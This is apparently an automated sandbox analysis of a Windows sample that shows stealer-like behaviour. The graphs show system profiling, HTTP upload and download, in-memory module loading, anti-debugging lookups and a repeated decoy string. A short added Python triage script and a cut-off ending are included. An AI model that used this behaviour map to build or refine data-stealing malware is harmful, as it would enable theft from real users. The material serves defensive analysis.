14421->14422 14423 525a1d 14422->14423 14424 525fc3 InternetCloseHandle 14423->14424 14426 538b60 3 API calls 14423->14426 14425 525fe0 14424->14425 14429 529ac0 4 API calls 14425->14429 14427 525a3c 14426->14427 14428 53a920 3 API calls 14427->14428 14430 525a4f 14428->14430 14431 525fe6 14429->14431 14432 53a8a0 lstrcpy 14430->14432 14433 53a820 2 API calls 14431->14433 14435 52601f ctype 14431->14435 14437 525a58 14432->14437 14434 525ffd 14433->14434 14436 53a9b0 4 API calls 14434->14436 14439 53a7a0 lstrcpy 14435->14439 14438 526013 14436->14438 14441 53a9b0 4 API calls 14437->14441 14440 53a8a0 lstrcpy 14438->14440 14449 52604f 14439->14449 14440->14435 14442 525a82 14441->14442 14443 53a8a0 lstrcpy 14442->14443 14444 525a8b 14443->14444 14445 53a9b0 4 API calls 14444->14445 14446 525aaa 14445->14446 14447 53a8a0 lstrcpy 14446->14447 14448 525ab3 14447->14448 14450 53a920 3 API calls 14448->14450 14449->13321 14451 525ad1 14450->14451 14452 53a8a0 lstrcpy 14451->14452 14453 525ada 14452->14453 14454 53a9b0 4 API calls 14453->14454 14455 525af9 14454->14455 14456 53a8a0 lstrcpy 14455->14456 14457 525b02 14456->14457 14458 53a9b0 4 API calls 14457->14458 14459 525b21 14458->14459 14460 53a8a0 lstrcpy 14459->14460 14461 525b2a 14460->14461 14462 53a9b0 4 API calls 14461->14462 14463 525b56 14462->14463 14464 53a920 3 API calls 14463->14464 14465 525b5d 14464->14465 14466 53a8a0 lstrcpy 14465->14466 14467 525b66 14466->14467 14468 525b7c InternetConnectA 14467->14468 14468->14424 14469 525bac HttpOpenRequestA 14468->14469 14471 525fb6 InternetCloseHandle 14469->14471 14472 525c0b 14469->14472 14471->14424 14473 53a9b0 4 API calls 14472->14473 14474 525c1f 14473->14474 14475 53a8a0 lstrcpy 14474->14475 14476 525c28 14475->14476 14477 53a920 3 API calls 14476->14477 14478 525c46 14477->14478 14479 53a8a0 lstrcpy 14478->14479 14480 525c4f 14479->14480 14481 53a9b0 4 API calls 14480->14481 14482 525c6e 14481->14482 14483 53a8a0 lstrcpy 14482->14483 14484 525c77 
14483->14484 14485 53a9b0 4 API calls 14484->14485 14486 525c98 14485->14486 14487 53a8a0 lstrcpy 14486->14487 14488 525ca1 14487->14488 14489 53a9b0 4 API calls 14488->14489 14490 525cc1 14489->14490 14491 53a8a0 lstrcpy 14490->14491 14492 525cca 14491->14492 14493 53a9b0 4 API calls 14492->14493 14494 525ce9 14493->14494 14495 53a8a0 lstrcpy 14494->14495 14496 525cf2 14495->14496 14497 53a920 3 API calls 14496->14497 14498 525d10 14497->14498 14499 53a8a0 lstrcpy 14498->14499 14500 525d19 14499->14500 14501 53a9b0 4 API calls 14500->14501 14502 525d38 14501->14502 14503 53a8a0 lstrcpy 14502->14503 14504 525d41 14503->14504 14505 53a9b0 4 API calls 14504->14505 14506 525d60 14505->14506 14507 53a8a0 lstrcpy 14506->14507 14508 525d69 14507->14508 14509 53a920 3 API calls 14508->14509 14510 525d87 14509->14510 14511 53a8a0 lstrcpy 14510->14511 14512 525d90 14511->14512 14513 53a9b0 4 API calls 14512->14513 14514 525daf 14513->14514 14515 53a8a0 lstrcpy 14514->14515 14516 525db8 14515->14516 14517 53a9b0 4 API calls 14516->14517 14518 525dd9 14517->14518 14519 53a8a0 lstrcpy 14518->14519 14520 525de2 14519->14520 14521 53a9b0 4 API calls 14520->14521 14522 525e02 14521->14522 14523 53a8a0 lstrcpy 14522->14523 14524 525e0b 14523->14524 14525 53a9b0 4 API calls 14524->14525 14526 525e2a 14525->14526 14527 53a8a0 lstrcpy 14526->14527 14528 525e33 14527->14528 14529 53a920 3 API calls 14528->14529 14530 525e54 14529->14530 14531 53a8a0 lstrcpy 14530->14531 14532 525e5d 14531->14532 14533 525e70 lstrlen 14532->14533 15329 53aad0 14533->15329 14535 525e81 lstrlen GetProcessHeap RtlAllocateHeap 15330 53aad0 14535->15330 14537 525eae lstrlen 14538 525ebe 14537->14538 14539 525ed7 lstrlen 14538->14539 14540 525ee7 14539->14540 14541 525ef0 lstrlen 14540->14541 14542 525f04 14541->14542 14543 525f1a lstrlen 14542->14543 15331 53aad0 14543->15331 14545 525f2a HttpSendRequestA 14546 525f35 InternetReadFile 14545->14546 14547 525f6a InternetCloseHandle 14546->14547 14551 525f61 
14546->14551 14547->14471 14549 53a9b0 4 API calls 14549->14551 14550 53a8a0 lstrcpy 14550->14551 14551->14546 14551->14547 14551->14549 14551->14550 14554 531077 14552->14554 14553 531151 14553->13323 14554->14553 14555 53a820 lstrlen lstrcpy 14554->14555 14555->14554 14562 530db7 14556->14562 14557 530f17 14557->13331 14558 530e27 StrCmpCA 14558->14562 14559 530e67 StrCmpCA 14559->14562 14560 530ea4 StrCmpCA 14560->14562 14561 53a820 lstrlen lstrcpy 14561->14562 14562->14557 14562->14558 14562->14559 14562->14560 14562->14561 14564 530f67 14563->14564 14565 531044 14564->14565 14566 530fb2 StrCmpCA 14564->14566 14567 53a820 lstrlen lstrcpy 14564->14567 14565->13339 14566->14564 14567->14564 14569 53a740 lstrcpy 14568->14569 14570 531a26 14569->14570 14571 53a9b0 4 API calls 14570->14571 14572 531a37 14571->14572 14573 53a8a0 lstrcpy 14572->14573 14574 531a40 14573->14574 14575 53a9b0 4 API calls 14574->14575 14576 531a5b 14575->14576 14577 53a8a0 lstrcpy 14576->14577 14578 531a64 14577->14578 14579 53a9b0 4 API calls 14578->14579 14580 531a7d 14579->14580 14581 53a8a0 lstrcpy 14580->14581 14582 531a86 14581->14582 14583 53a9b0 4 API calls 14582->14583 14584 531aa1 14583->14584 14585 53a8a0 lstrcpy 14584->14585 14586 531aaa 14585->14586 14587 53a9b0 4 API calls 14586->14587 14588 531ac3 14587->14588 14589 53a8a0 lstrcpy 14588->14589 14590 531acc 14589->14590 14591 53a9b0 4 API calls 14590->14591 14592 531ae7 14591->14592 14593 53a8a0 lstrcpy 14592->14593 14594 531af0 14593->14594 14595 53a9b0 4 API calls 14594->14595 14596 531b09 14595->14596 14597 53a8a0 lstrcpy 14596->14597 14598 531b12 14597->14598 14599 53a9b0 4 API calls 14598->14599 14600 531b2d 14599->14600 14601 53a8a0 lstrcpy 14600->14601 14602 531b36 14601->14602 14603 53a9b0 4 API calls 14602->14603 14604 531b4f 14603->14604 14605 53a8a0 lstrcpy 14604->14605 14606 531b58 14605->14606 14607 53a9b0 4 API calls 14606->14607 14608 531b76 14607->14608 14609 53a8a0 lstrcpy 14608->14609 14610 531b7f 
14609->14610 14611 537500 6 API calls 14610->14611 14612 531b96 14611->14612 14613 53a920 3 API calls 14612->14613 14614 531ba9 14613->14614 14615 53a8a0 lstrcpy 14614->14615 14616 531bb2 14615->14616 14617 53a9b0 4 API calls 14616->14617 14618 531bdc 14617->14618 14619 53a8a0 lstrcpy 14618->14619 14620 531be5 14619->14620 14621 53a9b0 4 API calls 14620->14621 14622 531c05 14621->14622 14623 53a8a0 lstrcpy 14622->14623 14624 531c0e 14623->14624 15332 537690 GetProcessHeap RtlAllocateHeap 14624->15332 14627 53a9b0 4 API calls 14628 531c2e 14627->14628 14629 53a8a0 lstrcpy 14628->14629 14630 531c37 14629->14630 14631 53a9b0 4 API calls 14630->14631 14632 531c56 14631->14632 14633 53a8a0 lstrcpy 14632->14633 14634 531c5f 14633->14634 14635 53a9b0 4 API calls 14634->14635 14636 531c80 14635->14636 14637 53a8a0 lstrcpy 14636->14637 14638 531c89 14637->14638 15339 5377c0 GetCurrentProcess IsWow64Process 14638->15339 14641 53a9b0 4 API calls 14642 531ca9 14641->14642 14643 53a8a0 lstrcpy 14642->14643 14644 531cb2 14643->14644 14645 53a9b0 4 API calls 14644->14645 14646 531cd1 14645->14646 14647 53a8a0 lstrcpy 14646->14647 14648 531cda 14647->14648 14649 53a9b0 4 API calls 14648->14649 14650 531cfb 14649->14650 14651 53a8a0 lstrcpy 14650->14651 14652 531d04 14651->14652 14653 537850 3 API calls 14652->14653 14654 531d14 14653->14654 14655 53a9b0 4 API calls 14654->14655 14656 531d24 14655->14656 14657 53a8a0 lstrcpy 14656->14657 14658 531d2d 14657->14658 14659 53a9b0 4 API calls 14658->14659 14660 531d4c 14659->14660 14661 53a8a0 lstrcpy 14660->14661 14662 531d55 14661->14662 14663 53a9b0 4 API calls 14662->14663 14664 531d75 14663->14664 14665 53a8a0 lstrcpy 14664->14665 14666 531d7e 14665->14666 14667 5378e0 3 API calls 14666->14667 14668 531d8e 14667->14668 14669 53a9b0 4 API calls 14668->14669 14670 531d9e 14669->14670 14671 53a8a0 lstrcpy 14670->14671 14672 531da7 14671->14672 14673 53a9b0 4 API calls 14672->14673 14674 531dc6 14673->14674 14675 53a8a0 lstrcpy 
14674->14675 14676 531dcf 14675->14676 14677 53a9b0 4 API calls 14676->14677 14678 531df0 14677->14678 14679 53a8a0 lstrcpy 14678->14679 14680 531df9 14679->14680 15341 537980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14680->15341 14683 53a9b0 4 API calls 14684 531e19 14683->14684 14685 53a8a0 lstrcpy 14684->14685 14686 531e22 14685->14686 14687 53a9b0 4 API calls 14686->14687 14688 531e41 14687->14688 14689 53a8a0 lstrcpy 14688->14689 14690 531e4a 14689->14690 14691 53a9b0 4 API calls 14690->14691 14692 531e6b 14691->14692 14693 53a8a0 lstrcpy 14692->14693 14694 531e74 14693->14694 15343 537a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14694->15343 14697 53a9b0 4 API calls 14698 531e94 14697->14698 14699 53a8a0 lstrcpy 14698->14699 14700 531e9d 14699->14700 14701 53a9b0 4 API calls 14700->14701 14702 531ebc 14701->14702 14703 53a8a0 lstrcpy 14702->14703 14704 531ec5 14703->14704 14705 53a9b0 4 API calls 14704->14705 14706 531ee5 14705->14706 14707 53a8a0 lstrcpy 14706->14707 14708 531eee 14707->14708 15346 537b00 GetUserDefaultLocaleName 14708->15346 14711 53a9b0 4 API calls 14712 531f0e 14711->14712 14713 53a8a0 lstrcpy 14712->14713 14714 531f17 14713->14714 14715 53a9b0 4 API calls 14714->14715 14716 531f36 14715->14716 14717 53a8a0 lstrcpy 14716->14717 14718 531f3f 14717->14718 14719 53a9b0 4 API calls 14718->14719 14720 531f60 14719->14720 14721 53a8a0 lstrcpy 14720->14721 14722 531f69 14721->14722 15350 537b90 14722->15350 14724 531f80 14725 53a920 3 API calls 14724->14725 14726 531f93 14725->14726 14727 53a8a0 lstrcpy 14726->14727 14728 531f9c 14727->14728 14729 53a9b0 4 API calls 14728->14729 14730 531fc6 14729->14730 14731 53a8a0 lstrcpy 14730->14731 14732 531fcf 14731->14732 14733 53a9b0 4 API calls 14732->14733 14734 531fef 14733->14734 14735 53a8a0 lstrcpy 14734->14735 14736 531ff8 14735->14736 15362 537d80 GetSystemPowerStatus 14736->15362 14739 53a9b0 4 API calls 14740 532018 14739->14740 14741 53a8a0 lstrcpy 14740->14741 14742 
Execution graph, condensed (the rendered node and edge list is omitted; functions are listed with the API calls the graph reaches inside them, in graph order; 53a9b0 = lstrcpy, lstrlen, lstrcpy, lstrcat; 53a920 = lstrcpy, lstrcat plus 53a7a0; 53a8a0, 53a740, 53a7a0, 521590 = lstrcpy):
• 532021 (system information collection): the string helpers above assemble one buffer between GetCurrentProcessId; 539470 (OpenProcess, GetModuleFileNameExA, CloseHandle); 537e00 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey); 537f60 (GetLogicalProcessorInformationEx, GetLastError, re-allocation through 538a10 GetProcessHeap/RtlAllocateHeap and 5389f0 GetProcessHeap/HeapFree with a retry, wsprintfA); 537ed0 (GetSystemInfo, wsprintfA); 538100 (GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, __aulldiv, wsprintfA); 5387c0 (GetProcessHeap, RtlAllocateHeap, wsprintfA); 5381f0 (string assembly only); 538320, called twice (RegOpenKeyExA, then per subkey RegEnumKeyExA, wsprintfA, RegOpenKeyExA, RegQueryValueExA, lstrlen, a second RegQueryValueExA, RegCloseKey); 538680 (CreateToolhelp32Snapshot, Process32First, Process32Next in a loop, CloseHandle); then lstrlen, 53a740, 521590, 535190 and on to 525100.
• 537bcc (locale): GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA in a loop, LocalFree; 538d20 (LocalAlloc, CharToOemW); 537a9a (wsprintfA); 537720 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey) followed by 5376c6 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey).
• 525100 (HTTP request): 5247b0 (lstrlen, InternetCrackUrlA); 538ea0 (CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA), lstrlen, 538ea0 again; InternetOpenA, StrCmpCA; 538b60 (GetSystemTime); InternetConnectA; HttpOpenRequestA; InternetCloseHandle on the exit paths (5258b7, 5258c4).
• 525009 (download): 53aad0, InternetOpenUrlA, InternetReadFile in a loop, InternetCloseHandle twice.
• 529af9 (decode): LocalAlloc, CryptStringToBinaryA, LocalFree.
• 530759 (dispatch): three StrCmpCA comparisons (530799, 530865, 53099c) select 52fb00, 530250 (538de0, 2 API calls) or 530030, each preceded by 53a7a0/521590 string copies.
• 5298d0 → 529880 → 526fb0 → 526d40 (in-memory loading): 526660 (VirtualAlloc, a second VirtualAlloc on the fallback path); 5269b0 (LoadLibraryA, then GetProcAddress in a loop with 538a10 GetProcessHeap/RtlAllocateHeap and 5389f0 GetProcessHeap/HeapFree); VirtualFree and FreeLibrary on the teardown path, then 5389f0.

                                      Control-flow Graph (condensed; block ids and edges of the rendered graph omitted)
                                      • 539860-539874: call 539750; 53987a-539a8e: call 539780, then GetProcAddress * 21 (all against the handle 74DD0000 in the listing below).
                                      • 539a93-539af2: LoadLibraryA * 5.
                                      • 539af4-539bc2: seven further GetProcAddress calls in groups of 1, 2, 1, 1 and 2, each group being one arm of a conditional at 539a93, 539b0d, 539b46, 539b68 or 539b89; the listing below shows five distinct handles for them, and the final lookup passes the plain-text name NtQueryInformationProcess.
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00F12BA0), ref: 005398A1
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CA8), ref: 005398BA
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CC0), ref: 005398D2
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B10), ref: 005398EA
                                      • GetProcAddress.KERNEL32(74DD0000,00F12C60), ref: 00539903
                                      • GetProcAddress.KERNEL32(74DD0000,00F19780), ref: 0053991B
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C70), ref: 00539933
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CB0), ref: 0053994C
                                      • GetProcAddress.KERNEL32(74DD0000,00F12A80), ref: 00539964
                                      • GetProcAddress.KERNEL32(74DD0000,00F12A98), ref: 0053997C
                                      • GetProcAddress.KERNEL32(74DD0000,00F12AE0), ref: 00539995
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CD8), ref: 005399AD
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CF0), ref: 005399C5
                                      • GetProcAddress.KERNEL32(74DD0000,00F12C78), ref: 005399DE
                                      • GetProcAddress.KERNEL32(74DD0000,00F12AB0), ref: 005399F6
                                      • GetProcAddress.KERNEL32(74DD0000,00F05DB0), ref: 00539A0E
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B28), ref: 00539A27
                                      • GetProcAddress.KERNEL32(74DD0000,00F12BB8), ref: 00539A3F
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C30), ref: 00539A57
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B88), ref: 00539A70
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B30), ref: 00539A88
                                      • LoadLibraryA.KERNEL32(00F12D50,?,00536A00), ref: 00539A9A
                                      • LoadLibraryA.KERNEL32(00F12D38,?,00536A00), ref: 00539AAB
                                      • LoadLibraryA.KERNEL32(00F12DC8,?,00536A00), ref: 00539ABD
                                      • LoadLibraryA.KERNEL32(00F12DB0,?,00536A00), ref: 00539ACF
                                      • LoadLibraryA.KERNEL32(00F12DE0,?,00536A00), ref: 00539AE0
                                      • GetProcAddress.KERNEL32(75A70000,00F12D20), ref: 00539B02
                                      • GetProcAddress.KERNEL32(75290000,00F12D68), ref: 00539B23
                                      • GetProcAddress.KERNEL32(75290000,00F12D80), ref: 00539B3B
                                      • GetProcAddress.KERNEL32(75BD0000,00F12D98), ref: 00539B5D
                                      • GetProcAddress.KERNEL32(75450000,00F05D10), ref: 00539B7E
                                      • GetProcAddress.KERNEL32(76E90000,00F197C0), ref: 00539B9F
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00539BB6
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00539BAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: aa1e505f950670c9847dd9a3bc7329e902b6fbf936f7a5ac0330af98eb0a2082
                                      • Instruction ID: 6ca33e904e4904a067b3be94cb175c003d57eb2432325bbdb53516f3d35ad41b
                                      • Opcode Fuzzy Hash: aa1e505f950670c9847dd9a3bc7329e902b6fbf936f7a5ac0330af98eb0a2082
                                      • Instruction Fuzzy Hash: 79A16BB5500341BFC345EFA8EE889663BF9F79C301704C51AE607A3264D6BDA841DF2A
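                                      The APIs listing above for 539860 is the raw material a triager works from: which module handle each GetProcAddress resolves against, how many lookups pass a name the sandbox did not render as a string (shown as an 8-hex-digit pointer), and which plain-text names appear (here NtQueryInformationProcess). The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's listing format and builds that summary. The eight input lines are copied from the listing above; the WATCHLIST set of API names is an assumption of the example.

```python
import re
from collections import defaultdict

# Eight lines copied verbatim from the APIs listing of function 539860;
# the format is "<API>.<MODULE>(<arg>, ...), ref: <call site>".
API_LINES = """\
• GetProcAddress.KERNEL32(74DD0000,00F12BA0), ref: 005398A1
• GetProcAddress.KERNEL32(74DD0000,00F12CA8), ref: 005398BA
• LoadLibraryA.KERNEL32(00F12D50,?,00536A00), ref: 00539A9A
• LoadLibraryA.KERNEL32(00F12D38,?,00536A00), ref: 00539AAB
• GetProcAddress.KERNEL32(75A70000,00F12D20), ref: 00539B02
• GetProcAddress.KERNEL32(75290000,00F12D68), ref: 00539B23
• GetProcAddress.KERNEL32(76E90000,00F197C0), ref: 00539B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00539BB6
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# An argument rendered as an 8-hex-digit pointer or "?" is not a readable name.
POINTER_RE = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")

# Assumed watchlist for this example (not taken from the report): names whose
# run-time resolution by string is worth a second look during triage.
WATCHLIST = {
    "NtQueryInformationProcess", "NtSetInformationThread", "IsDebuggerPresent",
    "CheckRemoteDebuggerPresent", "VirtualProtect", "WriteProcessMemory",
}


def parse_api_lines(text):
    """Turn listing lines into dicts; lines that do not fit the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress calls by module handle (their first argument) and
    record the plain-text names among them; count LoadLibraryA calls; flag
    watchlisted names together with the call site that resolved them."""
    by_handle = defaultdict(lambda: {"count": 0, "named": []})
    loads, flagged = 0, []
    for c in calls:
        if c["api"] == "LoadLibraryA":
            loads += 1
        elif c["api"] == "GetProcAddress":
            handle = c["args"][0]
            name = c["args"][1] if len(c["args"]) > 1 else "?"
            by_handle[handle]["count"] += 1
            if not POINTER_RE.match(name):
                by_handle[handle]["named"].append(name)
                if name in WATCHLIST:
                    flagged.append((name, c["ref"]))
    return {"loads": loads, "by_handle": dict(by_handle), "flagged": flagged}


if __name__ == "__main__":
    summary = summarize_resolution(parse_api_lines(API_LINES))
    print(f"LoadLibraryA calls: {summary['loads']}")
    for handle, info in summary["by_handle"].items():
        print(f"  {handle}: {info['count']} GetProcAddress, named: {info['named']}")
    for name, ref in summary["flagged"]:
        print(f"  flagged {name} resolved at {ref:08X}")
```

                                      The same regex accepts every line of the other APIs listings on this page, so the full listing for a function can be pasted in unchanged. A handle with many lookups and no readable names is the pattern to expect when import names are decrypted just before resolution; a readable name on a watchlist is the cheap signal to pivot on.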

                                      Control-flow Graph (condensed; block ids and edges of the rendered graph omitted)
                                      • 5245c0-524695: RtlAllocateHeap; 5246a0-5246a6 heads a loop whose body 5246ac-52474a branches back to it; the loop exit 52474f-5247a9 calls VirtualProtect. In the VirtualProtect arguments listed below, 00000100 is PAGE_GUARD if that position is the flNewProtect parameter.
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0052460F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0052479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., the same string at 30 xrefs: 005245C7, 005245D2, 005245DD, 005245E8, 005245F3, 00524617, 00524622, 0052462D, 00524638, 00524643, 00524657, 00524662, 0052466D, 00524678, 00524683, 005246AC, 005246B7, 005246C2, 005246CD, 005246D8, 00524713, 0052471E, 00524729, 00524734, 0052473F, 0052474F, 0052475A, 00524765, 00524770, 0052477B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: the same fourteen .sdmp files listed under the Memory Dump Source of 539860 above.
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in 
the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 0673aada18f2d6530cbabe4569619a4754cde376a6c934fe9c06b0462998afea
                                      • Instruction ID: b15b6ed4603382f2d1ff8245e0f0d9c83a031fd074f235376306018364f44346
                                      • Opcode Fuzzy Hash: 0673aada18f2d6530cbabe4569619a4754cde376a6c934fe9c06b0462998afea
                                      • Instruction Fuzzy Hash: 0241F6706C7E047BE624BFAFA843EFD7B577F4AB0CF605844AA4467681DBF06500A522

                                      Control-flow Graph

                                      control_flow_graph 801 524880-524942 call 53a7a0 call 5247b0 call 53a740 * 5 InternetOpenA StrCmpCA 816 524944 801->816 817 52494b-52494f 801->817 816->817 818 524955-524acd call 538b60 call 53a920 call 53a8a0 call 53a800 * 2 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a920 call 53a8a0 call 53a800 * 2 InternetConnectA 817->818 819 524ecb-524ef3 InternetCloseHandle call 53aad0 call 529ac0 817->819 818->819 905 524ad3-524ad7 818->905 829 524f32-524fa2 call 538990 * 2 call 53a7a0 call 53a800 * 8 819->829 830 524ef5-524f2d call 53a820 call 53a9b0 call 53a8a0 call 53a800 819->830 830->829 906 524ae5 905->906 907 524ad9-524ae3 905->907 908 524aef-524b22 HttpOpenRequestA 906->908 907->908 909 524b28-524e28 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 